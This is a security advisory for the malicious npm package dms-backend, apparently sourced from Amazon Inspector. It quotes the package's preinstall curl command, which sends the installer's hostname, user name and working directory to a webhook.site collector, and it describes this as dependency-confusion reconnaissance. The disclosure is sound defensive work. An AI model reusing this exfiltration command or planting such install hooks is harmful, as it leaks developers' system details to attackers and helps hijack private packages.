npm · Malicious package advisory
Malwaredms-backend
MAL-2026-5826
Malicious code in dms-backend (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (bd479ea3869dae33e183f9164c4e9c7c11a2170728288012647fe2af4d55426e) package.json declares a preinstall lifecycle script that runs `curl --data-urlencode "info=$(hostname && whoami && pwd)"` against a webhook.site collector URL (https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/dms-backend). This fires automatically on `npm install` and leaks installer-side identifiers — hostname, current OS user, and install working directory — to an attacker-controlled webhook bin. The package ships no real functionality; the preinstall recon beacon is the package's only behavior, which is the canonical shape of a dependency-confusion reconnaissance probe (the name `dms-backend` suggests targeting an internal/private registry name to hijack installs of an organization's private package).
Compromised versions (1)
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.